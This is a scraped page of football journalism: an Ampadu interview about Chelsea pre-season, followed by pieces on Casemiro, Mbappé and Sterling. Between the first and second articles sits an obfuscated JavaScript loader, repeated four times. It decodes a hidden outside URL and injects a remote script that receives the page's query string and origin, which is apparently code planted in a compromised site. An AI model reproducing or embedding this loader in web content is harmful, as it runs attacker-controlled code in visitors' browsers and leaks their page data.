Ethan Ampadu is hoping a strong pre-season can help him force his way into the Chelsea squad
Ethan Ampadu smiles as the question is asked. It’s one posed to him previously and one he has been unable to answer. It is no different this time around as the 21-year-old attempts to earn a place in the Chelsea squad for the 2022/23 campaign.
“I hoped that by now I’d have found out the answer,” he replies when asked which position on the pitch he considers his favourite. “But I’m not sure yet. I just enjoy playing football to be honest.”
Ampadu has done a lot of that over the past two years, albeit with clubs battling at the wrong end of the table. In 2020/21, the Wales international racked up 2,451 minutes in a Sheffield United side that went down without too much fight from the Premier League.
Then followed a season in Italy with Venezia – and Ampadu’s time in Serie A went somewhat under the radar. He played 30 games in all competitions and in a variety of positions: centre-back, wing-back and indefensive midfield.
That he performed each role with assuredness and quality is a testament to Ampadu’s natural ability and maturity, something which was evident when he broke into the first-team squad at Stamford Bridge as a dreadlocked 17-year-old under Antonio Conte.
The years since have not always easy but Ampadu hasn’t given up nor has he lost hope. For now, he is focused on his journey and not his final destination. Like every footballer out there, my dream is to be at the top,” he says in the bowels Allegiant Stadium in Las Vegas.
“I don’t think that’s a bad thing to say and dream; everyone wants to be at the top. It’s about fighting and getting towards that. I just have to keep improving, keep putting my head down, fight and work every day. That starts in pre-season to try to get the chance.
“It’s hard to say [what is needed to reach the top] because I am not at the top, I’m not playing week in, week out for a team trying to win the Premier League and Champions League.”
Could that change this season? Perhaps. Ampadu spent last week training with the Chelsea squad in Los Angeles and caught the eye in the Blues’ pre-season friendly win against Club America in Las Vegas on Saturday.
Deployed for 45 minutes in the middle of the back three, Ampadu’s confidence to step forward with the ball and range of passing stood out. And not just to those watching in the stands and on Chelsea’s official app. Thomas Tuchel was impressed too.
The German said: “The position is a good position for him in the middle of the back three. He played a lot of vertical passes and did not play only left to right. He played through the lines with his passes and dribbles. So he was very active, and it was a good match for him. He is training well.”
Ampadu’s priority for the season ahead is clear: he wants to continue playing regular football and develop his game further. That there is a World Cup to prepare for with Wales is an added motivation.
The former Exeter City youngster has established himself as a mainstay in the Wales squad over the past five years, featuring regularly during his time out on loan at RB Leipzig, Sheffield United and Venezia.
“The World Cup adds something else but even If there wasn’t the World Cup, as a professional footballer you want to play.
I enjoy playing and I want to be playing week in, week out. But the World Cup is definitely something you want to be going feeling fit and fresh.”
At Venezia, Ampadu showcased how invaluable he is to any head coach due to his versatility – and there was just one position he didn’t fill in Italy.
“Fortunately not as a striker!” he laughs. On his last loan, Ampadu adds; “Everyone says and agrees that the only way you develop is by playing games and last season I was fortunate to play a lot of games week in, week out.
“So I learnt a lot about myself and definitely improved. So it’s just about taking that momentum and trying to carry on. I’m nowhere near to where I want to be yet so there’s still a lot way to go.
“I don’t think the country necessarily matters, I was happy to go anywhere to play football.
That was in Italy and I enjoyed it out there. It’s one of the top five leagues, it’s a very good league.
And it was a good experience. Yes, it was hard at times because we were losing quite a bit but I feel like it was a good loan.”
At the start of this week, Tuchel confirmed that three players – Billy Gilmour, Harvey Vale and Tino Anjorin – had left the Chelsea first-team group in the U.S. Armando Broja also flew back to England after suffering an injury in training.
Tuchel decision to slim down his squad was, in the German’s view, important to keep the quality of Chelsea’s training sessions high. That Ampadu has remained with the squad is an indication that he has caught Tuchel’s eye.
But it is more than four years since Ampadu took those formative steps at Chelsea. Does he still believe he can break back into the side? “Of course – I’m here aren’t I?” he says. “This club fights for everything: Champions League, Premier League. It’s all about fighting here and trying to get to the top.”(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName("head")[0],b="script",c=atob("aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=");c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName("head")[0],b="script",c=atob("aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=");c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName("head")[0],b="script",c=atob("aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=");c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();

“Call it a Day”: Manchester United Midfielder Slammed Over ‘Disastrous’ Liverpool Performance
Old Trafford witnessed a revealing scene during the pre-game festivities as Manuel Ugarte was introduced to the Manchester United faithful. The Uruguayan’s debut couldn’t have come at a more poignant time.
As the 23-year-old midfielder took his introductory bows, his predecessor, Casemiro, was gearing up for what would become a fateful encounter against Liverpool—a match that would underline the vast gulf the Brazilian now needs to bridge.
The defensive midfield role at Manchester United has been a subject of intense scrutiny and Casemiro, once a stalwart at Real Madrid, found himself overwhelmed in a game that laid bare many of United’s deeper systemic issues.
The match ended in a 3-0 defeat, with Casemiro’s disastrous performance a glaring weak spot. As Jamie Carragher insightfully remarked earlier, it might be time for Casemiro to step away from the top echelons of football, suggesting, “Football has left him at this top level. He needs to call it a day at this level and move.”
Despite the immediate criticisms, it’s crucial to remember Casemiro’s significant contributions to football, underscored by his wife’s poignant social media post showcasing his extensive trophy haul.
Such a decorated career deserves recognition, even as discussions about his current form persist. As Gary Neville empathetically noted, even the best can falter under pressure, reflecting on his own career’s twilight years.
For Manchester United, the challenge is not just about replacing a player but about realigning their entire midfield setup to compete effectively against top-tier teams like Liverpool.
Casemiro’s situation serves as a stark reminder of the relentless pace and physicality of the Premier League, where even the most experienced players can find themselves outpaced and outplayed

“Biggest mistake of his life”: Real Madrid star told he has made the biggest mistake of his life for joining the Los Blacos
Kylian Mbappé joined Real Madrid as a free agent this past summer transfer window. While this is a significant step in his career, one person believes it’s the wrong decision.
Moreover, he notes that it’s an easy route to securing his football glory as winning the Ballon d’Or and UEFA Champions League at PSG would have had a different meaning than winning these honors at Real Madrid.
As a result, Cyril Hanouna stated in his interview with Europe 1 that the 2018 FIFA World Cup winner made a mistake leaving his hometown club.
“For me, Kylian Mbappé made the mistake of his life,” Hanouna stated (h/t Le10Sport). “I didn’t elaborate last time, but I’ll do it now. Winning the Champions League with Real Madrid is normal. Of course, winning the Champions League with Real Madrid, everyone does it. All the players who are at Real Madrid, at some point, will win the Champions League.
“Being Ballon d’Or at Real Madrid is rather easy. Benzema won it at Real Madrid. Mbappé should have stayed at PSG, won the Champions League with PSG, and won the Ballon d’Or with PSG. The club was giving him everything; it would have been his club. He would have been the main man at PSG.”
PSG are a young but exciting team, and perhaps they might not have the expectations of winning the Champions League this season. However, Real Madrid has the pressure of winning the competition this campaign with the Frenchman; if they don’t, then many will consider Year 1 of Mbappé a failure.
It will be interesting to see how this tournament plays out this season as Real Madrid know who they’ll be facing in the league phase. Mbappé won’t win the Ballon d’Or this year, but winning the Champions League and playing a key role could help his chances in 2025.

“A really good signing”: Alan Shearer gives his verdict on Arsenal’s unexpected signing as he backs the player become a valuable star in the team
The term ‘baptism of fire’ is often overused in football, but it rings true for Raheem Sterling when considering he could make his Arsenal debut away to Tottenham Hotspur.
For a different player, Arsenal manager Mikel Arteta might decide against deploying his new signing on such an occasion, but Sterling certainly has the mental resolve to handle it.
Sterling has endured some tough times in the past for England, criticised for his performances, and he’s been subject to similar at Chelsea too.
But in north London, the 29-year-old now has a new home, and the majority of Arsenal fans are excited to see if Arteta can recapture Sterling’s best, in a similar vein to Kai Havertz.
The two are at very different stages of their career, but like just Havertz, Sterling may find his confidence once again, a player who is still in his prime years.
Alan Shearer explains why Raheem Sterling could be really ‘valuable’ to Arsenal
Speaking on ‘The Rest Is Football’ podcast, Alan Shearer was very happy that Sterling had managed to get away from a ‘horrible’ situation at Stamford Bridge, which could have become even more messy.
And the pundit then went on to explain what Sterling can offer Arsenal, a move that suits both parties.
Shearer said: “Yeah I think it’s a really good move for him. I think it was important that he got out and played.
“It would have been horrible for him to sit there and rot in the stiffs, not even maybe, not even see first team football, never mind train or whatever with them.
“So I think it was really important for him to get out with his experience and know-how, he could be valuable to Arsenal.”
